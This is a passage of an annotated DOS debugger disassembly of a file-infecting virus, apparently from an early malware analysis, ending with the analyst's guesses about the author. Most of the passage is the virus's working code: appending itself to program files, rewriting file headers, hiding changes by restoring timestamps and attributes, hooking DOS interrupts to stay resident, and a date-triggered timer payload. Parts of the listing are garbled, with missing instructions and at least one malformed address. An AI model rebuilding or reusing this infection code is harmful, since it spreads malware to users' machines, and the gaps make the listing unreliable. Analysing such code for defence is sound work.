1E72:2964 BA0000 MOV DX,0000
1E72:2967 E89601 CALL int21 ; seek to the beginning
; of the file
1E72:296A 7303 JNB 296F
1E72:296C EB73 JMP 29E1 ; oops, close it
1E72:296E 90 NOP
1E72:296F B440 MOV AH,40
1E72:2971 BA4F01 MOV DX,014F
1E72:2974 B90400 MOV CX,0004
1E72:2977 E88601 CALL int21 ; write new header
1E72:297A 7303 JNB 297F
1E72:297C EB63 JMP 29E1 ; oops, close it
1E72:297E 90 NOP
1E72:297F B80242 MOV AX,4202
1E72:2982 B90000 MOV CX,0000
1E72:2985 BA0000 MOV DX,0000
1E72:2988 E87501 CALL int21 ; move to end of file
1E72:298B 7303 JNB 2990
1E72:298D EB52 JMP 29E1 ; oops, close file and
; and return
1E72:298F 90 NOP
; now we are ready to append the virus code to the
; file.
1E72:2990 53 PUSH BX ; save handle
1E72:2991 BA0000 MOV DX,0000
1E72:2994 A13E01 MOV AX,[013E] ; get low size of file
1E72:2997 B9C40A MOV CX,0AC4
1E72:299A 03C1 ADD AX,CX ; add size of virus
1E72:299C BB3300 MOV BX,0033
1E72:299F F7F3 DIV BX
1E72:29A1 83C133 ADD CX,+33 ; add modulo bytes
1E72:29A4 2BCA SUB CX,DX ; subtract reminder. now
; cx is the size of the
; virus plus the number
; of junk bytes, needed
; to make the final size
; of the file divideable
; by 33.
1E72:29A6 5B POP BX ; restore handle
1E72:29A7 B440 MOV AH,40 ; write to file/device
1E72:29A9 BA0001 MOV DX,0100 ; source is ds:dx
1E72:29AC E85101 CALL int21 ; call dos
1E72:29AF 7204 JB 29B5 ; test error
1E72:29B1 3BC1 CMP AX,CX ; all written ?
1E72:29B3 742C JZ 29E1 ; yes, close file and
; retain its attributes
; a write error occured
1E72:29B5 B80042 MOV AX,4200
1E72:29B8 B90000 MOV CX,0000
1E72:29BB BA0000 MOV DX,0000
1E72:29BE E83F01 CALL int21 ; seek to beginning
1E72:29C1 B440 MOV AH,40
1E72:29C3 BA0301 MOV DX,0103
1E72:29C6 B90400 MOV CX,0004
1E72:29C9 E83401 CALL int21 ; write original header
1E72:29CC B80042 MOV AX,4200
1E72:29CF 8B0E4001 MOV CX,[0140]
1E72:29D3 8B163E01 MOV DX,[013E]
1E72:29D7 E82601 CALL int21 ; seek to the original
; end of the file
1E72:29DA E81000 CALL 29ED ; close file & set its
; attributes
1E72:29DD A2F401 MOV [01F4],AL
1E72:29E0 C3 RET
; subroutine to reset a files attributes after
; seeking to its end and closing it. this routine
; returns the drive letter in al where ths file under
; investigation was found.
1E72:29E1 B80242 MOV AX,4202
1E72:29E4 B90000 MOV CX,0000
1E72:29E7 BA0000 MOV DX,0000
1E72:29EA E81301 CALL int21 ; seek to eof
; soubroutine to reset a files attributes to values
; stored in the dta. they were filled up by the
; search first/search next operations
1E72:29ED 8B0E3A01 MOV CX,[013A]
1E72:29F1 8B163C01 MOV DX,[013C]
1E72:29F5 B80157 MOV AX,5701
1E72:29F8 E80501 CALL int21 ; set date and time
1E72:29FB B43E MOV AH,3E
1E72:29FD E80001 CALL int21 ; close file
1E72:2A00 B80143 MOV AX,4301
1E72:2A03 BAF401 MOV DX,01F4
1E72:2A06 8A0E3901 MOV CL,[0139]
1E72:2A0A B500 MOV CH,00
1E72:2A0C E8F100 CALL int21 ; set attributes
1E72:2A0F B020 MOV AL,20
1E72:2A11 8606A801 XCHG AL,[01A8]
1E72:2A15 C3 RET
; this is the dos int 21 interposer.
1E72:2A16 9C PUSHF
1E72:2A17 3DE033 CMP AX,33E0 ; special installation
; test.
1E72:2A1A 7504 JNZ 2A20
1E72:2A1C B0E0 MOV AL,E0 ; return e0 instead of
; the dos value ff for
; this invalid call
1E72:2A1E 9D POPF
1E72:2A20 9D POPF
1E72:2A21 9C PUSHF
1E72:2A22 50 PUSH AX
1E72:2A23 53 PUSH BX
1E72:2A24 51 PUSH CX
1E72:2A25 52 PUSH DX
1E72:2A26 56 PUSH SI
1E72:2A27 57 PUSH DI
1E72:2A28 55 PUSH BP
1E72:2A29 1E PUSH DS
1E72:2A2A 06 PUSH ES
1E72:2A2B 80FC31 CMP AH,31 ; keep process
1E72:2A2E 743F JZ 2A6F
1E72:2A30 80FC00 CMP AH,00 ; terminate
1E72:2A33 7447 JZ 2A7C
1E72:2A35 80FC4C CMP AH,4C ; terminate
1E72:2A38 7442 JZ 2A7C
1E72:2A3A 80FC39 CMP AH,39 ; create dir
1E72:2A3D 744D JZ 2A8C
1E72:2A3F 80FC3A CMP AH,3A ; remove dir
1E72:2A42 7448 JZ 2A8C
1E72:2A44 80FC3C CMP AH,3C ; create file
1E72:2A47 7443 JZ 2A8C
1E72:2A49 3D013D CMP AX,3D01 ; open for writing
1E72:2A4C 743E JZ 2A8C
1E72:2A4E 80FC41 CMP AH,41 ; delete file
1E72:2A51 7439 JZ 2A8C
1E72:2A53 80FC43 CMP AH,43 ; change attributes
1E72:2A56 7434 JZ 2A8C
1E72:2A58 80FC56 CMP AH,56 ; move directory entry
1E72:2A5B 742F JZ 2A8C
1E72:2A5D 80FC13 CMP AH,13 ; delete file (FCB)
1E72:2A60 743D JZ 2A9F
1E72:2A62 80FC16 CMP AH,16 ; create file (FCB)
1E72:2A65 7438 JZ 2A9F
1E72:2A67 80FC17 CMP AH,17 ; rename file (FCB)
1E72:2A6A 7433 JZ 2A9F
1E72:2A6C EB22 JMP 2A90
1E72:2A6E 90 NOP
1E72:2A6F 2E CS:
1E72:2A70 803E500200 CMP BYTE PTR [0250],00
1E72:2A75 7519 JNZ 2A90
1E72:2A77 8AD8 MOV BL,AL
1E72:2A79 EB43 JMP 2ABE
1E72:2A7B 90 NOP
; this routine is interposed on terminate calls
1E72:2A7C 2E CS:
1E72:2A7D 803E500200 CMP BYTE PTR [0250],00
1E72:2A82 750C JNZ 2A90
1E72:2A84 BA0000 MOV DX,0000
1E72:2A87 8AD8 MOV BL,AL
1E72:2A89 EB33 JMP 2ABE
1E72:2A8B 90 NOP
; this function is interposed on handle oriented
; file io calls
1E72:2A8C FB STI
1E72:2A8D E8A4FD CALL 2834
; here we come to resume the old dos entry point
1E72:2A90 07 POP ES
1E72:2A91 1F POP DS
1E72:2A92 5D POP BP
1E72:2A93 5F POP DI
1E72:2A94 5E POP SI
1E72:2A95 5A POP DX
1E72:2A96 59 POP CX
1E72:2A97 5B POP BX
1E72:2A98 58 POP AX
1E72:2A99 9D POPF
1E72:2A9A 2E CS:
1E72:2A9B FF2E0C01 JMP FAR [010C]
; this routine is interposed on delete, create and
; rename functions related to FCB's
1E72:2A9F FB STI
1E72:2AA0 E869FD CALL 280C
1E72:2AA3 EBEB JMP 2A90
; the next function is the dos terminate and stay
; resident interrupt (int 27) interposer.
; become resident with given number of bytes in
; dx. this size is rounded to paragraphs. retain
; exit code given on entry in al.
1E72:2AA5 83C406 ADD SP,+06
1E72:2AA8 D1EA SHR DX,1
1E72:2AB0 42 INC DX
1E72:2AB1 8AD8 MOV BL,AL
1E72:2AB3 EB09 JMP 2ABE ; goto common code
1E72:2AB5 90 NOP
; the next function is the interposer for the
; interrupt 20, terminate program
; terminate with exit code 0 and no paragraphs to
; be retained
1E72:2AB6 83C406 ADD SP,+06
1E72:2AB9 BA0000 MOV DX,0000
1E72:2ABC B300 MOV BL,00
; common code follows
1E72:2ABE B80000 MOV AX,0000 ; make interrupt vector
; table addressable
1E72:2AC1 8ED8 MOV DS,AX
1E72:2AC3 2E CS: ; set vector 20
1E72:2AC4 A11401 MOV AX,[0114]
1E72:2AC7 A38000 MOV [0080],AX
1E72:2ACA 2E CS:
1E72:2ACB A11601 MOV AX,[0116]
1E72:2ACE A38200 MOV [0082],AX
1E72:2AD1 2E CS: ; set vector 27
1E72:2AD2 A11001 MOV AX,[0110]
1E72:2AD5 A39C00 MOV [009C],AX
1E72:2AD8 2E CS:
1E72:2AD9 A11201 MOV AX,[0112]
1E72:2ADC A39E00 MOV [009E],AX
1E72:2ADF 2E CS:
1E72:2AE0 C606500201 MOV BYTE PTR [0250],01
1E72:2AE5 FB STI
1E72:2AE6 B8C40B MOV AX,0BC4 ; get a fixed area
1E72:2AE9 D1E8 SHR AX,1
1E72:2AEB D1E8 SHR AX,1
1E72:2AED D1E8 SHR AX,1
1E72:2AEF D1E8 SHR AX,1
1E72:2AF1 40 INC AX
1E72:2AF2 03D0 ADD DX,AX
1E72:2AF4 B80031 MOV AX,3100
1E72:2AF7 8AC3 MOV AL,BL ; restore exit code
1E72:2AF9 9C PUSHF
1E72:2AFB 2E CS:
1E72:2AFC FF1E0C01 CALL FAR [010C] ; terminate and stay
; resident. this call
; does not return
; the next routine is used to call dos for internal
; operations
1E72:2B00 9C PUSHF
1E72:2B01 FA CLI
1E72:2B02 2E CS:
1E72:2B03 FF1E0C01 CALL FAR [010C]
1E72:2B07 C3 RET
; here we enter during the start of a infected
; program. the way to this location passes two
; unconditional jmp instructions
-u 2b08,2cf6
1CF5:2B08 9C PUSHF ; save registers
1CF5:2B09 50 PUSH AX
1CF5:2B0A 53 PUSH BX
1CF5:2B0B 51 PUSH CX
1CF5:2B0C 52 PUSH DX
1CF5:2B0D 56 PUSH SI
1CF5:2B0E 57 PUSH DI
1CF5:2B0F 55 PUSH BP
1CF5:2B10 1E PUSH DS
1CF5:2B11 06 PUSH ES
; the call to the following dos function is always
; invalid. if the virus is resident, the dos
; interrupt becomes interposed. this interposer
; returns e0 in al for the following function.
; the interposer can be found at location 2A16.
1CF5:2B12 B8E033 MOV AX,33E0 ; ctrl-c check (?)
1CF5:2B15 CD21 INT 21
1CF5:2B19 7423 JZ 2B3E ; if error -> 2b3e. this
; means the virus is not
; jet installed.
1CF5:2B1B 8CCE MOV SI,CS ; move in code segment
1CF5:2B1F 8B360101 MOV SI,[0101] ; get offset for jmp.
1CF5:2B23 81C60601 ADD SI,0106 ; find saved code
1CF5:2B27 B90400 MOV CX,0004 ; restore first 4 bytes
1CF5:2B2A BF0001 MOV DI,0100 ; move to 100
1CF5:2B2E A4 MOVSB ; move it
1CF5:2B2F 07 POP ES ; restore registers
1CF5:2B30 1F POP DS
1CF5:2B31 5D POP BP
1CF5:2B32 5F POP DI
1CF5:2B33 5E POP SI
1CF5:2B34 5A POP DX
1CF5:2B35 59 POP CX
1CF5:2B36 5B POP BX
1CF5:2B37 58 POP AX
1CF5:2B38 9D POPF
1CF5:2B39 BD0001 MOV BP,0100
1CF5:2B3C FFE5 JMP BP ; jump to old entry
; if we come here, we may assume the virus is not jet
; installed
1CF5:2B3E B104 MOV CL,04
1CF5:2B40 8CC8 MOV AX,CS
1CF5:2B42 BEE30A MOV SI,0AE3 ; get size of the
; resident part of the
; virus
1CF5:2B47 46 INC SI ; si seems to be a the
; paragraph count
1CF5:2B4D 47 INC DI ; di is always (?) 1000
1CF5:2B4E 03C6 ADD AX,SI
1CF5:2B50 03C7 ADD AX,DI
1CF5:2B52 03C7 ADD AX,DI
1CF5:2B54 40 INC AX ; sum up, but what ? i
; assume the virus lets
; installs only if there
; are (2000+X+a few)
; paragraphs left. X is
; the amount of
; paragraphs needed by
; the virus
1CF5:2B55 2E CS:
1CF5:2B56 3B060200 CMP AX,[0002] ; in cs:[0002] we find
; the segment adrs of
; the top of the memory
1CF5:2B5A 73BF JNB 2B1B ; enter original program
1CF5:2B5C 07 POP ES ; restore registers
1CF5:2B60 5E POP SI
1CF5:2B61 5A POP DX
1CF5:2B62 59 POP CX
1CF5:2B63 5B POP BX
1CF5:2B64 58 POP AX
1CF5:2B65 9D POPF
1CF5:2B66 8BE8 MOV BP,AX ; ax contains the info
; whether the drives
; given on the
; commandline are valid
1CF5:2B68 E9E600 JMP 2C51 ; jump to install
; routine
1CF5:2B6D 2E CS:
1CF5:2B6E 8E160A01 MOV SS,[010A]
1CF5:2B72 BC0000 MOV SP,0000
1CF5:2B75 2E CS:
1CF5:2B76 8E1E0A01 MOV DS,[010A]
1CF5:2B7A 2E CS:
1CF5:2B7B 8E060A01 MOV ES,[010A]
1CF5:2B7F BD0000 MOV BP,0000
1CF5:2B82 55 PUSH BP
1CF5:2B83 9C PUSHF
1CF5:2B84 50 PUSH AX
1CF5:2B85 53 PUSH BX
1CF5:2B86 51 PUSH CX
1CF5:2B87 52 PUSH DX
1CF5:2B88 56 PUSH SI
1CF5:2B89 57 PUSH DI
1CF5:2B8A 55 PUSH BP
1CF5:2B8C 06 PUSH ES
; the nex section of code saves the contents of some
; interrupt vectors
1CF5:2B8E B80000 MOV AX,0000 ; use data segment 0
1CF5:2B91 8ED8 MOV DS,AX
1CF5:2B93 C43E8000 LES DI,[0080] ; get int 20 (terminate)
1CF5:2B97 2E CS:
1CF5:2B98 893E1401 MOV [0114],DI ; store it to [114-117]
1CF5:2B9C 2E CS:
1CF5:2B9D 8C061601 MOV [0116],ES
1CF5:2BA1 C43E2000 LES DI,[0020] ; get int 8 (timer)
1CF5:2BA5 2E CS:
1CF5:2BA6 893E1C01 MOV [011C],DI ; store it to [11c-11f]
1CF5:2BAA 2E CS:
1CF5:2BAB 8C061E01 MOV [011E],ES
1CF5:2BAF C43E8400 LES DI,[0084] ; get int 21 (dos)
1CF5:2BB3 2E CS:
1CF5:2BB4 893E0C01 MOV [010C],DI ; store it to [10c-10f]
1CF5:2BB8 2E CS:
1CF5:2BB9 8C060E01 MOV [010E],ES
1CF5:2BBD C43E9C00 LES DI,[009C] ; get int 27 (tbsr)
1CF5:2BC1 2E CS:
1CF5:2BC2 893E1001 MOV [0110],DI ; store it to [110-113]
1CF5:2BC6 2E CS:
1CF5:2BC7 8C061201 MOV [0112],ES
; the next section sets up some interrupt vectors
1CF5:2BCC C70680008E09 MOV WORD PTR [0080],098E ; set int 20 (terminate)
1CF5:2BD2 8C0E8200 MOV [0082],CS
1CF5:92BD6 C7069C007D09 MOV WORD PTR [009C],097D ; set int 27 (tbsr)
1CF5:2BDC 8C0E9E00 MOV [009E],CS
1CF5:2BE0 C7068400EE08 MOV WORD PTR [0084],08EE ; set int 21 (dos)
1CF5:2BE6 8C0E8600 MOV [0086],CS
1CF5:2BEB 2E CS:
1CF5:2BEC 803E070100 CMP BYTE PTR [0107],00
1CF5:2BF1 744C JZ 2C3F
1CF5:2BF3 B42A MOV AH,2A
1CF5:2BF5 CD21 INT 21 ; get date
; cx = year
; dh = month
; dl = day
1CF5:2BF7 81F9C307 CMP CX,07C3 ; 7c3 == 1987 (dec)
1CF5:2BFB 720A JB 2C07 ; up to and including
; 1986 jump to 2c07
1CF5:2BFD 7710 JA 2C0F ; after 1896 jump to
; 2c0f
1CF5:2BFF 81FA0105 CMP DX,0501
1CF5:2C03 730A JNB 2C0F ; after 1.may jump to
; 2c0f
1CF5:2C05 EB38 JMP 2C3F
1CF5:2C07 2E CS:
1CF5:2C08 803E070102 CMP BYTE PTR [0107],02
1CF5:2C0D 7230 JB 2C3F
; we jump to this label always after 1986. also we
; come here any jear before 1986 after the 1. of may,
; which is a public holiday in germany
; the cx register still contains the year. this info
; is used later to generate a pseudo random number
1CF5:2C13 8ED8 MOV DS,AX
1CF5:2C15 A00E00 MOV AL,[000E] ; ffff:000e contains the
; machine type. this is
; fc for an ibm pc/at
; fd for an ibm pc/jr
; fe for an ibm pc/xt
; ff for an ibm pc
; by masking out, the
; virus detects if its
; running on an ibm
; machine.
1CF5:2C18 24FC AND AL,FC
1CF5:2C1D 7520 JNZ 2C3F ; jump if this is not
; an ibm machine
; in the next section a (pseudo-) random number is
; generated in al. besides some memory locations
; the current year is used for computations.
; in 1 of 4 cases (ax bits 0 and 1
; are zero) a new int 8 handler becomes established
1CF5:2C1F A16C04 MOV AX,[046C]
1CF5:2C22 03066E04 ADD AX,[046E]
1CF5:2C26 35AA55 XOR AX,55AA
1CF5:2C29 D3C9 ROR CX,CL
1CF5:2C2B 03C1 ADD AX,CX
1CF5:2C2D 2403 AND AL,03
1CF5:2C2F 3C00 CMP AL,00
1CF5:2C31 750C JNZ 2C3F
; the following is done only in 1/4 of all possible
; cases
1CF5:2C33 FA CLI ; replace int 8 (timer)
1CF5:2C34 C70620007A06 MOV WORD PTR [0020],067A
1CF5:2C3A 8C0E2200 MOV [0022],CS
1CF5:2C3F E896FB CALL 27D8 ; enable all data thats
; necessary to play a
; tune
; the next section looks like it is returning to the
; old main program ?
1CF5:2C42 07 POP ES
1CF5:2C43 1F POP DS
1CF5:2C44 5D POP BP
1CF5:2C45 5F POP DI
1CF5:2C46 5E POP SI
1CF5:2C47 5A POP DX
1CF5:2C48 59 POP CX
1CF5:2C49 5B POP BX
1CF5:2C4A 58 POP AX
1CF5:2C4C 2E CS:
1CF5:2C4D FF2E0801 JMP FAR [0108]
; here we come when we are going to make the
; virus resident in main memory. bp contains the
; value of the ax register it contained on program
; start.
1CF5:2C51 8CC8 MOV AX,CS ; addressability
1CF5:2C53 8ED8 MOV DS,AX
1CF5:2C55 8EC0 MOV ES,AX
1CF5:2C57 8B1E0101 MOV BX,[0101]
1CF5:2C5B 81C30301 ADD BX,0103 ; bx is offset to saved
; code from original
; file
1CF5:2C61 BEE30A MOV SI,0AE3
1CF5:2C64 03F3 ADD SI,BX
1CF5:2C66 D1EE SHR SI,1
1CF5:2C68 D1EE SHR SI,1
1CF5:2C6E 46 INC SI
1CF5:2C6F 03C6 ADD AX,SI
1CF5:2C71 8BD0 MOV DX,AX
1CF5:2C73 8ED2 MOV SS,DX
1CF5:2C78 B91F00 MOV CX,001F
1CF5:2C7F 81C7C40A ADD DI,0AC4
1CF5:2C83 81C6A50A ADD SI,0AA5
1CF5:2C87 FC CLD
1CF5:2C88 F3 REPZ
1CF5:2C89 A4 MOVSB
1CF5:2C8C 05C40A ADD AX,0AC4
1CF5:2C91 8CC8 MOV AX,CS
1CF5:2C93 BEC40B MOV SI,0BC4
1CF5:2C96 D1EE SHR SI,1
1CF5:2C98 D1EE SHR SI,1
1CF5:2C9E 46 INC SI
1CF5:2C9F 03C6 ADD AX,SI
1CF5:2CA5 BE0000 MOV SI,0000
1CF5:2CA8 BF0000 MOV DI,0000
1CF5:2CB3 BE0301 MOV SI,0103
1CF5:2CB6 BF0001 MOV DI,0100
1CF5:2CB9 B90400 MOV CX,0004
1CF5:2CBE 2E CS:
1CF5:2CBF C70608010001 MOV WORD PTR [0108],0100
1CF5:2CC5 2E CS:
1CF5:2CC6 8C060A01 MOV [010A],ES
1CF5:2CCF BE0000 MOV SI,0000
1CF5:2CD2 BF0000 MOV DI,0000
1CF5:2CDD BF0001 MOV DI,0100
1CF5:2CE2 B9C40A MOV CX,0AC4
1CF5:2CE7 B8690B MOV AX,0B69
1CF5:2CEC B80D00 MOV AX,000D
1CF5:2CF0 B80500 MOV AX,0005
1CF5:2CF3 50 PUSH AX
1CF5:2CF4 E83409 CALL 362B
-i would like to give final conclusions about the virus, which are my private
intentionally feeling:
the author of the virus seems to be one, who knows a lot about the 8088
processor. he (or she, who knows ?) seems to be someone familiar with the
concepts of the c programming language. by looking through the code, i
believe that he is not very familiar with the assembler itself. lots of
instructions could be more elegant. the computation of some constant values
could be left to the assembler, if he wold know the more advanced operators.